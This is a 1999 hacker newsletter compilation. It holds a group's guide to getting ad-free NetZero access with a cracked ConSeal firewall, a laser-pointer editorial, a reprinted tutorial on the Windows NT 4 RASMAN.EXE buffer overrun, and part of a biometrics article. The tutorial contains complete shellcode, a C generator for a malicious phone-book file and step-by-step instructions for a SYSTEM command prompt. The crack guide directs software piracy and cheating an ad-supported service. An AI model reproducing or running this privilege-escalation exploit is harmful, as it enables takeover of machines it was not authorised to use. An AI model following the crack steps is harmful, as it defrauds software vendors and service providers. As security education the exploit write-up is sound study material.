| | | | | |
| | | C:\> Free Internet provided by: | | |
| | | -=D3P SQU4D CR3W=- | | |
| | | http://bl4iz3.faithweb.com | | |
| | | Bad command or file name | | |
| | | Bad command or file name | | |
| | | | | |
| | | | | |
| | |_____________________________________________________________________________| | |
| | | |
| | | Status: Running Program Files | | Time Elapsed: 00:43 | | |
| |_________________________________________________________________________________| |
| |
| _________________________________________________________________________________ |
| |_________________________________________________________________________________| |
| |
| To get free internet access, please follow the following steps: |
| |
| 1)Download NetZero(A FREE ISP) at "http://members.xoom.com/HFDWPack/files/NetZero.exe" |
| |
| 2)Setup NetZero, and install into DEFAULT location. |
| a)Sign on for the first time and answer all those stupid questions(or they'll deny |
| you service) |
| |
| 3)Download ConSeal PC Firewall. at "http://bl4iz3.faithweb.com/hacking/files/ |
| ConSeal.exe" |
| |
| 4)Install ConSeal PC Firewall, set it up as custom, and BLOCK ALL ICMP (this will |
| stop all the ads NetZero will try and send you). REMEMBER: Install into DEFAULT |
| locations. |
| |
| 5)Download Conseal PC Firewall Crack. at "http://bl4iz3.faithweb.com/hacking/ |
| files/ConSeal135Crack.zip |
| a)Replace FRW.EXE in the zip file with FRW.EXE in "c:\program files". |
| |
| 6)Download NetZero batch file (YOU MUST SAVE THIS TO "c:\program files") create a |
| link to this on the desktop, that way you can just double-click to free internet |
| access anytime you want. |
| |
| 7)Now, every time you want to run your FREE internet access, just click on the |
| NetZero batch file. |
| |
| _________________________________________________________________________________ |
| |_________________________________________________________________________________| |
| |
| |
| Now, to explain the glitches in their system: |
| |
| NetZero sends a command, I believe through ICMP, which turns the dialup |
| program into an ad banner. This banner shows the ads which makes this service free. |
| |
| Now, the firewall blocks this command which turns the program into the ad banner. |
| Therefore, the ad NEVER starts up, and as far as Net Zero knows, the command went |
| through and BLAM, you're running a free ISP with NO ADS. |
| |
| I have not, as of this date, checked what makes this program change into the ad |
| banner, and eventually, I will TRY and find or make a crack for NetZero so you |
| won't have to go through with all this Firewall stuff. |
| ________________________________________________________________________________________|
| |
| k0pywr0ng (k)1999 -=D3P SQU4D CR3W=- |
| Check out http://bl4iz3.faithweb.com/kopywrong/ |
|_________________________________________________________________________________________|
53.0 Laser Pointers Illegal?
~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Code Kid
The San Francisco Housing and Social Policy Committee
will soon classify laser pointers in the same category as
spray paint, making it illegal for those under 18 to
purchase or posses them. Since limiting the sale of
spray paint cans has worked exceedingly well in
preventing graffiti in major cities it is thought that a
similar ban on laser pointers would be equally effective.
San Francisco Examiner
http://www.sfgate.com/cgi-bin/article.cgi?file=/examiner/archive/1999/05/20/EDITORIAL14125.dtl
Use a laser, go to jail
EXAMINER EDITORIAL WRITER May 20, 1999
CONSIDER the
what-can-go-wrong-WILL-go-wrong provisions of Murphy's Law and its corollaries, such as the Rule
of Toast by which the buttered side always hits the floor. Next comes the Law of Unintended
Consequences, particularly the high-tech subsections that gave us e-mail spam, undumpable
atomic waste, MTBE in our water, extortionate ATM fees and surrender of privacy to corporate
hackers.
Question: What do you get when you marry the laws of Murphy and Unintended Consequences?
Answer: The laser pointer.
These ingenious devices, originally intended as high-tech aids to professors and lecturers, send little
red beams as far as 1,500 feet. And, according to San Francisco Supervisor Michael Yaki, "These
so-called toys can distract, annoy and even injure other people when misused."
Accordingly, Yaki persuaded the board's Housing and Social Policy Committee on to approve
Tuesday a proposed ordinance patterned after laws in New York and other cities. It would make it a
crime to sell laser pointers to persons under age 18. It would compel storekeepers to keep them locked
up - as with cans of spray paint suitable for graffiti and tags - to discourage teen shoplifters. It would
make it a serious crime to point a beam at another person's face or, because of the possibility of a
driver's temporary blindness, at a moving vehicle.
Yes, it's true that the ban on sale of spray paint to juveniles didn't exactly put an end to tags and
graffiti. And laser pointers are considerably less dangerous than the lethal handguns far too
accessible to far too many kids. But we agree with Police Lt. Patricia Jackson, who called the pointers
an annoyance with disruptive potential.
The full board should approve Yaki's law and hope that it won't have unintended consequences of its
own.
©1999 San Francisco Examiner Page A 26
@HWA
54.0 Exploiting NT buffer overruns
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
NT 4 BUFFER OVERRUNS
by BHZ, Thursday 20th May 1999 on 10.50 pm CET
David Litchfield reported to BugTraq a study on exploiting NT 4 Buffer Overruns. "This
document is for educational purposes only and explains what a buffer overrun is and
shows how they can be exploited on the Windows NT 4 operating system using
RASMAN.EXE as a case study. We will take a look at Windows NT processes,
virtual address space, the dynamics of a buffer overrun and cover certain key issues
such as explaining what a stack is and what the ESP, EBP and EIP CPU registers
are and do". Read the study below.
Exploiting Windows NT 4 Buffer Overruns
A Case Study:
RASMAN.EXE
Introduction
This document is for educational purposes only and explains what a buffer overrun is and shows how they can be exploited on the Windows NT 4 operating system
using RASMAN.EXE as a case study. We will take a look at Windows NT processes, virtual address space, the dynamics of a buffer overrun and cover certain
key issues such as explaining what a stack is and what the ESP, EBP and EIP CPU registers are and do. With these covered we'll look into the buffer overrun found
in RASMAN.EXE. This document may be freely copied and distributed only in its entirety and if credit is given.
Cheers, David Litchfield
What is a buffer overrun?
A buffer overrun is when a program allocates a block of memory of a certain length and then tries to stuff too much data into the buffer, with the extra overflowing
and overwritting possibly critical information crucial to the normal execution of the program. Consider the following source:
#include <stdio.h>
int main ( )
{
char name[31];
printf("Please type your name: ");
gets(name);
printf("Hello, %s", name);
return 0;
}
When this source is compiled and turned into a program and the program is run it will assign a block of memory 32 bytes long to hold the name string. Under normal
operation someone would type in their name, for instance "David", and the program would then print to the screen "Hello, David". David is 5 letters long, with each
letter taking up a single byte. The end of a string, though, is denoted by a thing called a null terminator - which is basically a byte with a value of zero. So we need to
add a null terminator to the end of the string making a total length of 6 bytes. It is clear that 6 bytes will fit into the 32 bytes set aside to store the name string. If
however, instead of entering "David", we entered
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
that is 40 capital As, when the program reads in our input and places it in our buffer it overflows. 40 will definitely not fit into 32.
It so happens that if we enter 40 As we completely overwrite the contents of a special CPU register known as the Instruction Pointer or EIP - the E stands for
Extended by the way. A quick explanation of a register - a computer's processor has small memory storage units called registers. Access to the values held in these
registers is very quick. These registers have special names and can hold memory addresses and variables. The EIP is one of these registers and holds the memory
address of the next instruction to execute. What do I mean by instruction? A program contains a list of instructions for the processor to carry out in order for the
program to do its job, much like a recipe contains instructions for a cook to carry out in order to make a cake. These instructions are known as operation codes or
opcodes for short. So when a program is running and the processor is executing one of the program's instructions the EIP holds the memory address where the next
instruction to be executed can be found. After the current instruction has been executed the processor goes to that memory address and pulls in the instruction found
there and then increments the EIP and the executes that instruction. This process of pulling the opcode from the memory address pointed to by the EIP, then
incrementing the EIP then executing that instruction continues until the program exits.
Going back to our code, the fact that we have overwritten the EIP means that we can effectively tell the CPU to go to a memory address of our choosing and pull
down the instruction found there and execute that. Because we are filling the buffer with As we overwrite the EIP with 0x41414141 - 41 is the hex value for a capital
A. The processor then goes to address 0x41414141 and tries to read in the instruction found at that address. If there's no instruction there we get a thing known as
an Access Violation. Most people will know of this as a message popping up saying something like "The Instruction at '0x41414141' referenced memory at
'0x41414141'. The memory could not be read." If we had filled our buffer with Bs we would overwrite the EIP with 0x42424242 essentially telling the processor to
go that that memory address to get the next instruction and more than likely we'd get the same Access Violation.
Exploiting a buffer overrun.
As you'll see later on, being able to overwrite the EIP is vital to exploiting a buffer overrun. When you exploit a buffer overrun you basically get the processor to
execute instructions or code of your choosing getting the program to do something it would not normally do. You do this by pointing the EIP back into the buffer
which you load with your own opcodes which are then executed. This begs the question , "Why would someone want to do this?"
Windows NT, like UNIX systems, require a user to log into the system. Some users are very powerful, such as the Administrator and others are just your average
normal user that aren't as powerful. If a normal user wanted to become equivalent to the Administrator and thus just as powerful with almost full control of the system
they could exploit a buffer overrun to attain this. The problem is the buffer overrun needs to be in a process that has enough power and privileges to be able to make
them an Administrator so there is no point in buffer overruning a process that they, the user themselves, have started. They need to buffer overrun a process started
by the system and then get the process to execute their own arbitary code. The system account is very powerful, and if you can get a system process to do
something, such as open a Command Prompt, then it will run with system privileges. In Windows NT, if a process starts a new child process then the child process
normally inherits the access token of the parent process, normally because some processes can be started using the Win32 CreateProcessAsUser ( ) function that
will start the new process under the security context of another user and thus the new process will have a different access token than the parent process. An Access
Token is like a set of keys - they denote a user's rights and privileges that determine what they can and cannot do to the machine. An example of this is screen
savers. The winlogon.exe system process is responsible for starting a user's screen saver. As oppossed to runing the screen saver in the security context of the
system winlogon uses CreateProcessAsUser ( ) to start the screen saver in the security context of the currently logged on user. I digress - back to buffer overruns. In
this case study we'll look at the buffer overrun in RASMAN.EXE, a system process, and get it to open a Windows NT Command Prompt. This Command Prompt
will have the access token of the system account and so will any other processes started from it. But first a bit more on an NT process' virtual memory layout.
A process embodies many things such as, amongst others, a running program, one or more threads of execution, the process' virtual address space and the dynamic
link libraries (DLLs) the program uses. The process has 4 GB of virtual address space to use. Half of this is, from address 0x00000000 to 0x7FFFFFFF, private
address space where the program, its DLLs and stack (or stacks in the case of a multihthreaded program) are found and the other half, address 0x80000000 to
0xFFFFFFFF is the system address space where such things as NTOSKRNL.EXE and the HAL are loaded. As a side note, this default behaviour can be changed
as of service pack three - you can specify a switch in the boot.ini - /3GB - that will assign 3 GB as private address space and 1 GB as system address space. This is
to boost the performance of programs, such as databases, the require large amounts of memory.
When a program is run NT creates a new process. It loads the program's instructions and the DLLs the program uses into the private address space and marks the
pages it uses as read-only. Any attempt to modify pages in memory marked as read only will cause an Access Violation. The first thread is started and a stack is
initialised.
The Stack
What's the simplest way to describe a stack? Try this: Imagine a carpenter. He has tools, materials and instructions. To be able to make something though they need
a workbench. The stack is similar to this workbench. It is a place where he can use his tools to shape and model his raw materials. He can put something down on
the workbench, say waiting for the glue to dry on two bits of wood and do something else. When that task is complete he can come back to his two bits of wood
and continue with that. The workbench is where most of the work is done.
So too, in a process, the stack is where most things are done. It is a writeable area of memory that dynamically shrinks and grows as is needed or determined by the
program's execution. When a programatic task is started it'll place data on the stack, whether these be strings, memory addresses, integers or whatever, then
manipulate them and when the task has completed it will return the stack to its original state so that the next task can use it if it needs to. Working in this way the
process interacts with the stack using a method known as Last In, First Out or LIFO.
There are two registers that are crucial to the stack's functionality - they are used by the program to keep track of where data can be found in memory. These two
registers are the ESP and the EBP.
The ESP, or the Stack Pointer points to the top of the stack. The ESP contains the memory address where the top of the stack can be found. The ESP can be
changed in a number of ways both indirectly and directly.When something is PUSHed onto the stack the ESP increases accordingly. When something is POPed off
of the stack the ESP shrinks. The PUSH and POP operations modify the ESP indirectly. But then you can manipulate the ESP directly, with say an instruction of
"SUB esp,04h" which pushes the stack out by four bytes or one word. For those that haven't yet been numbed into boardem, something may just have irked: how is
it that you SUBtract 4 from the ESP and yet the ESP is pushed out? Well this is because the stack works backwards. The bottom of the stack uses a memory
address higher than the top of the stack:
----------------0x12121212 Top of the stack
...
...
----------------0x121212FF Bottom of the stack
Here we have definitive proof that the fathers of modern computing were indeed closet sadists or had shares in makers of paracetamol - occasionally they throw in
gems like this to make that headache that bit more acute. When we say the stack increases in size the address held in the ESP decreases. Conversly when the stack
size decreases the address held in the ESP increases. Reaching for the Asprin yet?
Our second stack related register is known as the EBP or the Base Pointer. The EBP holds then memory address of the bottom of the stack - more accurately it
points to a base point in the stack that we can use a reference point within a given programatic task. The EBP must have meaning to a given task and to facilitate this
before the task's real business is started a setup procedure known as the "procedure prologue" is first completed. What this does is, firstly, save the current EBP by
PUSHing it onto the stack. This is so that the processor and program will know where to pick up from after the currently executing task has completed. The ESP is
then copied into the EBP thus creating a new Base Pointer that the currently executing task can use as a reference point irrespective of how the ESP changes during
the task's execution. Continuing with this let's say an 11 character string was placed onto the stack - our EBP remains the same but the ESP has been pushed out by
12 bytes. Then say an address was PUSHed onto the stack - our ESP is pushed out by another 4 bytes, though our EBP still remains the same. Now let's say we
needed to reference the 11 byte string - we can do this by using our EBP: we know the first byte of our string (the pointer to the string) is twelve bytes away from
the EBP so we can reference this string's pointer by saying,"the address found at EBP minus 12". (Remember the stack goes from a higher address to a lower
address)
RASMAN and buffer overruns.
Finding the buffer overrun
The first thing you need to do to be able to exploit a buffer overrun is to a) know about an existing one or b) find your own one. In the case of RASMAN, the
overrun was found by looking at the RAS functions and the structures the used. Notice that some of the functions, such as RasGetDialParams ( ), fill structures that
contain characters arrays, much like char name[31] character array in the C code above. By playing around with rasphone.pbk file, the RAS Phone Book, where
dialing details, such as the phone number to be dialed, are stored, you can root out these overruns. Make a phone book entry called "Internet", which dials into your
ISP, dial it, and downloaded your mails. This is important as this adds to the Registry an entry for the domain name of your mail server as an Autodial location. That
is, if you try to contact your mail server, from that point on, without being dialed into the Internet, the Connection manager would kick in and automatically dial for
you. RASMAN is the process that handles this functionality. Once you have done this change the telephone number to a long string of As and then attempted to
connect to your mail server, say, by opening Outlook Express. This causes RASMAN to read in from rasphone.pbk the telephone number to dial to be able to get
to your mail server. But instead of the real telephone number the long string of As is read instead and fills a character array in the RAS_DIAL_PARAMS structure
which overflows causing an Access Violation - at address 0x41414141. We've found a buffer overrun and, more exciting, overwritten the EIP.
Finding where the EIP is overwritten
By experimenting with the length of the "telephone number" we find that we overwrite the EIP with bytes 296,297,298 and 299 of our string. (You'll find that, if you
are actually following this, you'll need to reboot the system after the overflow to be able to restart the service, and you'll have to end tasks such as AthenaWindow
and msmin.exe.) Once we have found where we overwrite the EIP it is time to get out the debugger - the debugging capabilities of Visual C++ are very good.
Attach to the RASMAN process and then get it to dial - or attempt to at least. Wait for the access violation.
Analyze what's going on.
Once the access violation has occured we need to look at the stack and the state of the CPU's registers. From this we can see that we also overwrite the EBP,
which will come in handy later on and that the address of the first A of our "telephone number" is 0x015DF105. By getting RASMAN to access violate a number of
times we find that the first A is always written to this address. This is the address we're going to set the EIP to so that the processor will look at that address for the
next instrution to execute. We'll stuff the "telephone number" full of our own opcodes that will get RASMAN to do what we want it to do - our arbitary code. We
then need to ask, "What do we want it to do?".
Where do you want to go today? - What do you want to acheive?
The best thing to do, as we need to be at the console to get this to work, is get RASMAN to open up a Command Prompt. From here we can run any program we
want with system privileges. The easiest way to get a program to run a Command Prompt, or any other program for that matter is to use the system ( ) function.
When the system ( ) function is called it looks at the value of the ComSpec environment variable, normally "c:\winnt\system32\cmd.exe" on Windows NT and
executes that with a "/C" switch. The function passes cmd.exe a command to run and the "/C" switch tells cmd.exe to exit after the command has finished executing.
If we pass "cmd.exe" as the command - system("cmd.exe"); - this will cause the system function to open up cmd.exe with the "/C" switch and execute cmd.exe - so
we are running two instances of the command interpreter - however the second one won't exit until we tell it to ( and nor will the first until the second one has exited.)
Rather than the placing the opcodes that actually form the system ( ) function in our exploit string it would be easier to simply call it. When you call a function you tell
the program to go to a certain DLL that contains the code for the function you are calling. The use of DLLs means that programs can be smaller in size - rather than
each program containing the necessary code for each function used they can call a shared DLL that does contain the code. DLLs are said to export functions - that
is the DLL provides an address where a function can be found. The DLL also has a base address so the system knows where to find that DLL. When a DLL is
loaded into a process' address space it will always be found at that base address and the functions it exports can then be found at an entry point within the base. The
system ( ) function is exported msvcrt.dll (the Microsoft Visual C++ Runtime library) which has base address of 0x78000000 and system ( ) entry point can be
found at 000208C3 (in version 5.00.7303 of msvcrt.dll anyway) meaning that the address of the system ( ) function is 0x780208C3. Hopefully msvcrt.dll will
already be loaded into RASMAN's address space - if it isn't we'll need to use LoadLibrary ( ) and GetProcAddress ( ). Fortunately RASMAN does use msvcrt.dll
and so it is already in the process address space. This makes the job of exploiting the buffer overrun very easy indeed - we'll simply build a stack with our string of
the command to run (cmd.exe) and and call it. What makes it even better is that the address 0x780208C3 has no nulls (00) in it. Nulls can really complicate issues.
To find out what the stack needs to look like when a normal program calls system("cmd.exe"); we need to write one that does and debug it. We'll need to get our
arbitary code to build a duplicate image of the stack as it appears in our program just before system ( ) is called. Below is the source of our program. Compile and
link it with kernel32.lib then run and debug it.
#include <windows.h>
#include <winbase.h>
typedef void (*MYPROC)(LPTSTR);
int main()
{
HINSTANCE LibHandle;
MYPROC ProcAdd;
char dllbuf[11] = "msvcrt.dll";
char sysbuf[7] = "system";
char cmdbuf[8] = "cmd.exe";
LibHandle = LoadLibrary(dllbuf);
ProcAdd = (MYPROC) GetProcAddress(LibHandle, sysbuf);
(ProcAdd) (cmdbuf);
return 0;
}
On debugging and examining the stack prior to calling system ( ) [(ProcAdd)(cmdbuf); in the above code] we see that starting from the top of the stack we find the
address of the "c" of cmd.exe, then the address of where the system ( ) function can be found, the null terminated cmd.exe string and a few other things that are too
important. So to emulate this we need the null terminated "cmd.exe"string in the stack, then the address of the system function and then the address which points to
our "cmd.exe" string. Below is a picture of what we need the stack to look like before calling system ( )
-------------------- ESP (Top of the Stack)
XX
--------------------
XX
--------------------
XX
--------------------
XX
--------------------
C3
--------------------
08
--------------------
02
--------------------
78
--------------------
63 c
--------------------
6D m
--------------------
64 d
--------------------
2E .
--------------------
65 e
--------------------
78 x
--------------------
65 e
--------------------
00
-------------------- EBP (Bottom of the stack)
where the top 4 XXs are the address of "c". We don't need to hardcode this address into our exploit string because we can use the EBP as a reference - remember
it is the base pointer. Later on you'll see that we load the address where the first byte of our cmd.exe string can be found into a register using the EBP as a reference
point.
Writing the Assembly.
This is what we need the stack to look like when we call system ( ). How do we get it there? We have to build it ourselves with our opcodes - we can't just put it in
our exploit string because as you can see there are nulls in it and we can't have nulls. Because we have to build it this is where knowing at least a little assembly
language comes in handy. The first thing we need to do is set the ESP to an address we can use for our stack. (Remember the ESP points to the top of the stack.)
To do this we use:
mov esp, ebp
This moves the EBP into the ESP - rember we overwrite the EBP as well as the EIP which is really handy. We'll overwrite the EBP with an address we know we
can write to - we will use 0x015DF124. Consequently the ESP, after we move the EBP into it, the top of the stack will be found at 0x015DF124.
We then want to push EBP onto the stack. This is our return address.
push ebp
This has the effect of pushing the ESP down 4 bytes and so ESP is now 0x015DF120. After this we then want to move the ESP into the EBP:
mov ebp,esp
This completes our own procedure prologue. With this done we can go about building the stack the way we want it to look
The next thing we need to do is get some nulls onto the stack. We need some nulls because we need to have our cmd.exe string terminated with a null. Even though
the cmd.exe string isn't there yet it will be but we have to do things in reverse order. Before we can push some nulls onto the stack we need to make some. We do
this by xoring a register with itself- we'll use the EDI register.
xor edi,edi
This will set the EDI to 00000000 and then we push it onto the stack using
push edi
This also has the added effect of pushing out our ESP to 0x015DF11C. But "cmd.exe" is 7 bytes long and we only have room for 4 bytes so far and don't forget we
need a null tacked on the end of our string so we need to push the ESP out another 4 bytes to give us a total of 8 bytes of space between the ESP and the EBP. We
could push the edi again, but for varitey we'll just sub the ESP by 4.
sub esp,04h
Our ESP is now 0x015DF118 and our EBP is 0x015DF120. Our next job is to get cmd.exe written to the stack. To do this we'll use the EBP as a reference point
and move 63, the hex value for a small "c" into the address offset from the EBP minus 8.
mov byte ptr [ebp-08h],63h
We do the same for the "m", the "d", the ".", the first"e", the "x" and the final "e".
mov byte ptr [ebp-07h],6Dh mov byte ptr [ebp-06h],64h mov byte ptr [ebp-05h],2Eh mov byte ptr [ebp-04h],65h mov byte ptr [ebp-03h],78h mov byte ptr
[ebp-02h],65h
Our stack now looks like this:
----------------------------------------------------- ESP
63 c
-----------------------------------------------------
6D m
-----------------------------------------------------
64 d
-----------------------------------------------------
2E .
-----------------------------------------------------
65 e
-----------------------------------------------------
78 x
-----------------------------------------------------
65 e
-----------------------------------------------------
00
----------------------------------------------------- EBP
All that we need to do now is put the address of system( ) onto the stack and the pointer to our cmd.exe string on top of that - once that is done we'll call the system
( ) function.
We know that the system( ) function is exported at address 0x780208C3 so we'll move this into a register and then push it onto the stack:
mov eax, 0x780208C3 push eax
We then want to put the address of the "c" of our "cmd.exe" string onto the stack. We know that the "c" can be found eight bytes away from our EBP so we'll load
the address 8 bytes less than the EBP into a register:
lea eax,[ebp-08h]
The EAX register now holds the address where our cmd.exe string begins. We then want to push this onto the stack:
push eax
With this done our stack is built and we are ready to call system ( ) but we don't call it directly - again we use the indirection of using our EBP as a reference point
and call address found at EBP minus 12 (or 0C in hex):
call dword ptr [ebp-0ch]
Here is all our code strung together.
mov esp,ebp
push ebp
mov ebp,esp
xor edi,edi
push edi
sub esp,04h
mov byte ptr [ebp-08h],63h
mov byte ptr [ebp-07h],6Dh
mov byte ptr [ebp-06h],64h
mov byte ptr [ebp-05h],2Eh
mov byte ptr [ebp-04h],65h
mov byte ptr [ebp-03h],78h
mov byte ptr [ebp-02h],65h
mov eax, 0x780208C3
push eax
lea eax,[ebp-08h]
push eax
call dword ptr [ebp-0ch]
The next thing to do is test this assembly to see if it works so we need to write a program that uses the __asm ( ) function. The __asm ( ) function takes Assembly
language and incorporates it into a C program. As we are calling system ( ) which is exported by msvcrt.dll we'll need to load that- we use the LoadLibrary ( )
function to do this - otherwise when run our code would fail:
#include <windows.h>
#include <winbase.h>
void main()
{
LoadLibrary("msvcrt.dll");
__asm {
mov esp,ebp
push ebp
mov ebp,esp
xor edi,edi
push edi
sub esp,04h
mov byte ptr [ebp-08h],63h
mov byte ptr [ebp-07h],6Dh
mov byte ptr [ebp-06h],64h
mov byte ptr [ebp-05h],2Eh
mov byte ptr [ebp-04h],65h
mov byte ptr [ebp-03h],78h
mov byte ptr [ebp-02h],65h
mov eax, 0x780208C3
push eax
lea eax,[ebp-08h]
push eax
call dword ptr [ebp-0ch]
}
}
compile and link with kernel32.lib. When run this should start a new instance of the Command Interperter, cmd.exe. There will be an access violation however when
you exit that instance in the program though - we've messed around with the stack and haven't clean up after ourselves.
That's it then - that's our arbritary code and all we need to do now is put this into the rasphone.pbk file as our telephone number. Before we can do that though, we
need to get the op-codes for the above assembly.
This is relatively easy - just debug the program you've just compiled and get the opcodes from there. You should get "8B E5" for "mov esp,ebp" and "55" for "push
ebp" etc etc. Once we have all the opcodes we need to put these in our "telephone number". But we can't type the opcodes very easily in Notepad. The easiest thing
to do is write another program that creates a rasphone.pbk file with the telephone number loaded with our arbitary code. Below is an example of such a program
with comments:
/* This program produces a rasphone.pbk file that will cause and exploit a buffer overrun in */
/* RASMAN.EXE - it will drop the user into a Command Prompt started by the system. */
/* It operates by re-writing the EIP and pointing it back into our exploit string which calls */
/* the system() function exported at address 0x780208C3 by msvcrt.dll (ver 5.00.7303) on */
/* NT Server 4 (SP3 & 4). Look at the version of msvcrt.dll and change buffer[109] to buffer[112]*/
/* in this code to suit your version. msvcrt.dll is already loaded in memory - it is used by */
/* RASMAN.exe. Developed by David Litchfield (mnemonix@globalnet.co.uk ) */
#include <stdio.h>
#include <windows.h>
int main (int argc, char *argv[])
{
FILE *fd;
int count=0;
char buffer[1024];
/* Make room for our stack so we are not overwriting anything we haven't */
/* already overwritten. Fill this space with nops */
while (count < 37)
{
buffer[count]=0x90;
count ++;
}
/* Our code starts at buffer[37] - we point our EIP to here @ address 0x015DF126 */
/* We build our own little stack here */
/* mov esp,ebp */
buffer[37]=0x8B;
buffer[38]=0xE5;
/*push ebp*/
buffer[39]=0x55;
/* mov ebp,esp */
buffer[40]=0x8B;
buffer[41]=0xEC;
/* This completes our negotiation */
/* We need some nulls */
/* xor edi,edi */
buffer[42]=0x33;
buffer[43]=0xFF;
/* Now we begin placing stuff on our stack */
/* Ignore this NOP */
buffer[44]=0x90;
/*push edi */
buffer[45]=0x57;
/* sub esp,4 */
buffer[46]=0x83;
buffer[47]=0xEC;
buffer[48]=0x04;
/* When the system() function is called you ask it to start a program or command */
/* eg system("dir c:\\"); would give you a directory listing of the c drive */
/* The system () function spawns whatever is defined as the COMSPEC environment */
/* variable - usually "c:\winnt\system32\cmd.exe" in NT with a "/c" parameter - in */
/* other words after running the command the cmd.exe process will exit. However, running */
/* system ("cmd.exe") will cause the cmd.exe launched by the system function to spawn */
/* another command prompt - one which won't go away on us. This is what we're going to do here*/
/* write c of cmd.exe to (EBP - 8) which happens to be the ESP */
/* mov byte ptr [ebp-08h],63h */
buffer[49]=0xC6;
buffer[50]=0x45;
buffer[51]=0xF8;
buffer[52]=0x63;
/* write the m to (EBP-7)*/
/* mov byte ptr [ebp-07h],6Dh */
buffer[53]=0xC6;
buffer[54]=0x45;
buffer[55]=0xF9;
buffer[56]=0x6D;
/* write the d to (EBP-6)*/
/* mov byte ptr [ebp-06h],64h */
buffer[57]=0xC6;
buffer[58]=0x45;
buffer[59]=0xFA;
buffer[60]=0x64;
/* write the . to (EBP-5)*/
/* mov byte ptr [ebp-05h],2Eh */
buffer[61]=0xC6;
buffer[62]=0x45;
buffer[63]=0xFB;
buffer[64]=0x2E;
/* write the first e to (EBP-4)*/
/* mov byte ptr [ebp-04h],65h */
buffer[65]=0xC6;
buffer[66]=0x45;
buffer[67]=0xFC;
buffer[68]=0x65;
/* write the x to (EBP-3)*/
/* mov byte ptr [ebp-03h],78h */
buffer[69]=0xC6;
buffer[70]=0x45;
buffer[71]=0xFD;
buffer[72]=0x78;
/*write the second e to (EBP-2)*/
/* mov byte ptr [ebp-02h],65h */
buffer[73]=0xC6;
buffer[74]=0x45;
buffer[75]=0xFE;
buffer[76]=0x65;
/* If the version of msvcrt.dll is 5.00.7303 system is exported at 0x780208C3 */
/* Use QuickView to get the entry point for system() if you have a different */
/* version of msvcrt.dll and change these bytes accordingly */
/* mov eax, 0x780208C3 */
buffer[77]=0xB8;
buffer[78]=0xC3;
buffer[79]=0x08;
buffer[80]=0x02;
buffer[81]=0x78;
/* Push this onto the stack */
/* push eax */
buffer[82]=0x50;
/* now we load the address of our pointer to the cmd.exe string into EAX */
/* lea eax,[ebp-08h]*/
buffer[83]=0x8D;
buffer[84]=0x45;
buffer[85]=0xF8;
/* and then push it onto the stack */
/*push eax*/
buffer[86]=0x50;
/* now we call our system () function - all going well a command prompt will */
/* be started, the parent process being rasman.exe */
/*call dword ptr [ebp-0Ch] */
buffer[87]=0xFF;
buffer[88]=0x55;
buffer[89]=0xF4;
/* fill to our EBP with nops */
count = 90;
while (count < 291)
{
buffer[count]=0x90;
count ++;
}
/* Re-write EBP */
buffer[291]=0x24;
buffer[292]=0xF1;
buffer[293]=0x5D;
buffer[294]=0x01;
/* Re-write EIP */
buffer[295]=0x26;
buffer[296]=0xF1;
buffer[297]=0x5D;
buffer[298]=0x01;
buffer[299]=0x00;
buffer[300]=0x00;
/* Print on the screen our exploit string */
printf("%s", buffer);
/* Open and create a file called rasphone.pbk */
fd = fopen("rasphone.pbk", "w");
if(fd == NULL)
{
printf("Operation failed\n");
return 0;
}
else
{
fprintf(fd,"[Internet]\n");
fprintf(fd,"Phone Number=");
fprintf(fd,"%s",buffer);
fprintf(fd,"\n");
}
return 0;
}
When compiled and run this program will create a rasphone.pbk file with one entry called Internet and a phone number loaded with our arbitary code. When
RASMAN.EXE opens this file and it uses RasGetDialParams ( ) to get the relevant information and assigns it to a RAS_DIAL_PARAMS structure which contains
the character arrays. As you'll have guessed we're overflowing the one that holds the telephone number.
Now to test it all.
Quite often when trying to exploit buffer overruns you don't get it right the first time - usually due to an oversight or something. The code in this document has been
tested on NT Server 4 with SP 3, NT Server 4 with SP 4 and NT Workstation SP 3 all running on a Pentium processor and it works - that's not to say that it will
run on your machine though. There could be a number of reasons why it might not, but that is up to you to find out. So any way, let's test it:
To be able to get this to work take the following steps:
1) Make a backup copy of your real rasphone.pbk file and then delete the original. The NTFS permissions on this file by default give everybody the Change
permission so there shouldn't be a problem with this.
2) Run rasphone (click on Start -> Run -> type rasphone -> OK). You should get a message saying that the phone book is empty and click OK to create a new
one.
3) Click OK and make a new entry calling it "Internet". Put in the relevant information needed to be able to dial into your ISP. Once the entry is complete dial it.
4) Once connected open Outlook Express and download your e-mails. The reason for doing this is because this will create a Registry entry for your mail server's
domain name and associate it as an autodialable address. If Outlook Express' connection is dial up change it to a LAN connection - this'll be under the mail
account's properties.
5) Hangup and close Outlook Express.
6) Copy the delete the new rasphone.pbk and replace it with your one made from the above code.
7) Open Outlook Express.
Because your not connected to the Internet RASMAN should automatically dial for you, read in from the Registry the autodail information then open rasphone.pbk,
fill its buffers and overflow. Within about eight seconds or so a Command Prompt window will open. This Command Prompt has SYSTEM privileges.
That's it - we've exploited a buffer overrun and executed our arbitary code.
@HWA
55.0 More on biometrics
~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
ZDNET ON BIOMETRICS
by BHZ, Thursday 20th May 1999 on 10.15 pm CET
Biometric security is well established now. Quick note: that this branch of computer
security where you don't need passwords but you could be recognized by your
thumb, eye or voice. ZdNet published an article about current biometric products ,
prices and standards. Read the article below.
http://www.zdnet.com/anchordesk/story/story_3395.html?chkpt=ad1qsfp
Berst Alert
WEDNESDAY, MAY 19, 1999
The Biometrics
Revolution
Jesse Berst, Editorial Director
ZDNet AnchorDesk
Our ever-frugal Tech Director Jon DeKeles strolled into the office the other day and
offered to buy everyone lunch. After I picked myself up off the floor, I demanded to see his ID. Some
alien creature had obviously taken control of his body -- lab coat and all.
If AnchorDesk had the latest biometric technology, I wouldn't ask for ID. I'd have voice-authentication
software to compare Jon's voice against an earlier voice-capture. Or I'd put him in front of a camera
lens to scan his iris and match it against iris codes in the database. The rapidly evolving science of
biometrics uses unique physical attributes -- voice, fingerprint, iris -- to identify users. Biometric
security products exist now. But it will be another year at least before we start realizing their full
potential. Here's a look at where the biometric roadmap will take us:
WHERE WE ARE
Biometrics have been around for decades. The public sector -- particularly military and law
enforcement -- were the early adopters. Today public agencies use biometrics for such things as
preventing welfare fraud and determining eligibility for health care benefits. But usage outside of
government remains spotty, particularly in the enterprise, for several reasons:
Steep prices. Costs range from less than $100 for a basic reading device to thousands for a fully
integrated access system. But Gartner Group research director Jackie Fenn says costs are
dropping dramatically. That will be key to widespread adoption.
